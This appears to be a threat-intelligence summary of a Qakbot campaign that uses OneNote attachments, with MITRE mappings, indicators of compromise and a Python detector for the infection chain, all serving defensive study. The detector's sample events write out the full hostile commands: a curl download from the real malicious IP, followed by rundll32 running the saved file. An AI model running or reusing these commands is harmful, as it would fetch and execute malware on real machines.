Threat actors are increasingly using OneNote attachments in spam campaigns to deliver Qakbot and other malware families. The infection chain drops an HTA loader via mshta, downloads a Qakbot DLL, and then executes it, enabling credential theft and lateral movement. #Qakbot #OneNote #Formbook #RedlineStealer #Asyncrat
Keypoints
- The campaign targets users with spam emails carrying OneNote attachments that deliver multiple malware families (Formbook, Redline Stealer, Asyncrat, and Qakbot).
- Initial infection begins with a OneNote attachment; opening it leads to a dropped .hta file executed by mshta.exe.
- The HTA contains JavaScript and VBScript that write obfuscated content to the registry and read it back to stage the payload.
- An anonymous JavaScript function downloads the Qakbot DLL via curl and stores it as a local file (%ProgramData%\121.png) before executing it with rundll32.exe.
- Qakbot then injects into wermgr.exe to steal credentials (browsers, email clients) and can spread to other devices for further malware deployment.
- Cyble emphasizes Qakbot as an evolving threat and provides defensive recommendations to reduce risk (phishing awareness, AV, MFA, DLP, etc.).
MITRE Techniques
- [T1566.001] Phishing – The initial infection starts with a spam email containing a OneNote attachment. “The initial infection starts with a spam email containing a OneNote attachment.”
- [T1218.005] Mshta – The OneNote delivery drops an embedded .hta file executed by mshta.exe. “embedded .hta file executed by mshta.exe”
- [T1059.007] JavaScript – The HTA file contains two JavaScript and two VBScript blocks and performs the following operations when executed. “The .hta file contains two JavaScript and two VBScript and performs the following operations when executed.”
- [T1059.005] Visual Basic – The HTA file contains two JavaScript and two VBScript blocks and performs the following operations when executed. “The .hta file contains two JavaScript and two VBScript and performs the following operations when executed.”
- [T1112] Modify Registry – VBScript creates a string value named “Name” under HKEY_CURRENT_USER\Software\FirmSoft and writes the obfuscated content there. “creates an in-string value “Name” under the registry key HKEY_CURRENT_USER\SOFTWARE\FirmSoft and writes the obfuscated content stored in the previous step.”
- [T1027] Obfuscated/Compressed Files and Information – The code reads obfuscated content and reconstructs a function. “The anonymous function now creates an in-string value under the registry and reads the obfuscated content from the registry and creates an anonymous function by using replace method.”
- [T1105] Ingress Tool Transfer – The payload is downloaded from a remote server via curl and saved locally. “downloads “19825.dat” file from the remote server and saves to %Programdata% location as “121.png”.”
- [T1218.011] Rundll32 – The downloaded DLL is executed using rundll32.exe. “Qakbot DLL file that will be executed using “rundll32.exe” by JavaScript.”
- [T1055] Process Injection – The DLL injects into wermgr.exe to perform stealing activities. “injects malicious code into “wermgr.exe” to perform stealing activities.”
- [T1555.003] Credentials in Web Browsers – Qakbot can steal usernames, passwords, and cookies from browsers. “Qakbot can steal sensitive information such as usernames, passwords, and cookies from browsers…”
- [T1021] Remote Services (Lateral Movement) – The malware can spread to other devices within the network to deploy other malware families. “It can spread to other devices within the network to deploy other malware families.”
- [T1071.001] Web Protocols – The payload is fetched over plain HTTP (curl to hxxp://77[.]75[.]230[.]128/19825[.]dat), and Cyble recommends monitoring beacons at the network level. “beacon on the network level to block data exfiltration by malware or TAs.”
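The techniques above chain into a sequence that is easy to hunt for in endpoint telemetry: ONENOTE.EXE spawning mshta.exe, a registry write under HKCU\Software\FirmSoft, curl.exe writing a .dat download to %ProgramData% as a .png, rundll32.exe loading that .png, and wermgr.exe appearing under rundll32.exe. The script below is an added example written for this summary, not code from Cyble or from the Qakbot sample; the Sysmon-style events it runs over are constructed to mimic the chain (the rundll32 export ordinal `#1` and the "wermgr.exe child of rundll32.exe" heuristic for T1055 are assumptions of the example, not facts from the report).

```python
"""Hunt for the OneNote -> mshta -> curl -> rundll32 -> wermgr chain.

Added example for this summary; the events below are constructed to look
like Sysmon process-creation (EID 1) and registry-set (EID 13) records and
are not taken from the Cyble report. Paths and PIDs are illustrative.
"""
import ntpath
from dataclasses import dataclass

# SHA256 indicators as listed in the IoC section of this summary.
IOC_SHA256 = {
    "b53bc20c9191f83e511c617ec7b8a5e05d5b77be5a1e44276f8cae761010d7d7": "email attachment (.eml)",
    "f18f10f9b74b987bf98d163bdfb7b619dcb7b39b3349ae3ccdcc5f348d6e0c75": "OneNote file",
    "7a51e7dec2080d22fea9edd2757b68687a7ba8c4dd1ba83ea7e68dc73539134b": "HTA file",
    "26b4c1b52c357b6c876c28ccbe95b86f93767142c050952c92cd774cc7dd8d37": "Qakbot DLL",
}


@dataclass(frozen=True)
class Finding:
    technique: str   # MITRE ATT&CK technique id
    pid: int         # process the finding is attached to
    detail: str      # command line, registry path or parent->child pair


def _base(image: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(image).lower()


def detect_chain(events):
    """Return one Finding per chain stage observed in `events`.

    Each event is a dict with: id (1 = process create, 13 = registry set),
    pid, ppid, image, and cmd (id 1) or target (id 13).
    """
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    findings = []
    for e in events:
        if e["id"] == 13:
            # T1112: VBScript stages the obfuscated payload under HKCU\Software\FirmSoft.
            # Match on the sub-key so HKCU\... and HKU\<SID>\... both hit.
            if "\\software\\firmsoft\\" in e["target"].lower():
                findings.append(Finding("T1112", e["pid"], e["target"]))
            continue
        img = _base(e["image"])
        parent = procs.get(e["ppid"])
        pimg = _base(parent["image"]) if parent else ""
        cmd = e["cmd"].lower()
        # T1218.005: OneNote has no legitimate reason to launch mshta.exe.
        if img == "mshta.exe" and pimg == "onenote.exe":
            findings.append(Finding("T1218.005", e["pid"], f"{pimg} -> mshta.exe"))
        # T1105: curl fetching a .dat and saving it as a .png under ProgramData.
        if img == "curl.exe" and ".dat" in cmd and "programdata" in cmd and ".png" in cmd:
            findings.append(Finding("T1105", e["pid"], e["cmd"]))
        # T1218.011: rundll32 "loading an image" from ProgramData (a renamed DLL).
        if img == "rundll32.exe" and "programdata" in cmd and ".png" in cmd:
            findings.append(Finding("T1218.011", e["pid"], e["cmd"]))
        # T1055 (heuristic, an assumption of this example): wermgr.exe normally
        # runs under svchost.exe/WerFault.exe, never under rundll32.exe.
        if img == "wermgr.exe" and pimg == "rundll32.exe":
            findings.append(Finding("T1055", e["pid"], f"{pimg} -> wermgr.exe"))
    return findings


def match_iocs(observed_hashes):
    """Map observed SHA256 values (any case) to the IoC labels from this page."""
    return {h: IOC_SHA256[h] for h in (x.lower() for x in observed_hashes) if h in IOC_SHA256}


# Constructed sample telemetry: the malicious chain plus one benign curl run.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 10, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "pid": 100, "ppid": 10, "image": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "cmd": r"ONENOTE.EXE C:\Users\u\Downloads\invoice.one"},
    {"id": 1, "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\u\AppData\Local\Temp\attach.hta"},
    {"id": 13, "pid": 101, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "target": r"HKCU\Software\FirmSoft\Name"},
    {"id": 1, "pid": 102, "ppid": 101, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe http://77.75.230.128/19825.dat -o C:\ProgramData\121.png"},
    {"id": 1, "pid": 103, "ppid": 101, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\ProgramData\121.png,#1"},   # export ordinal is assumed
    {"id": 1, "pid": 104, "ppid": 103, "image": r"C:\Windows\System32\wermgr.exe", "cmd": "wermgr.exe"},
    {"id": 1, "pid": 200, "ppid": 10, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe https://example.com/readme.txt -o C:\Users\u\readme.txt"},   # benign
]

if __name__ == "__main__":
    for f in detect_chain(SAMPLE_EVENTS):
        print(f"[{f.technique}] pid={f.pid} {f.detail}")
```

The registry check matches on the `\Software\FirmSoft\` sub-key rather than the hive prefix because Sysmon reports HKCU writes as `HKU\<SID>\...`; the curl rule keys on the three artefacts the report gives (a `.dat` source, `%ProgramData%` destination, `.png` extension) so a benign curl download in the same telemetry does not fire.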
Indicators of Compromise
- [SHA256] Email Attachment (.eml) – b53bc20c9191f83e511c617ec7b8a5e05d5b77be5a1e44276f8cae761010d7d7
- [SHA256] OneNote File – f18f10f9b74b987bf98d163bdfb7b619dcb7b39b3349ae3ccdcc5f348d6e0c75
- [SHA256] HTA File – 7a51e7dec2080d22fea9edd2757b68687a7ba8c4dd1ba83ea7e68dc73539134b
- [SHA256] Qakbot DLL – 26b4c1b52c357b6c876c28ccbe95b86f93767142c050952c92cd774cc7dd8d37
- [URL] Download URL – hxxp://77[.]75[.]230[.]128/19825[.]dat
- [Filename] Payload names – 121.png, 19825.dat
Read more: https://blog.cyble.com/2023/02/01/qakbots-evolution-continues-with-new-strategies/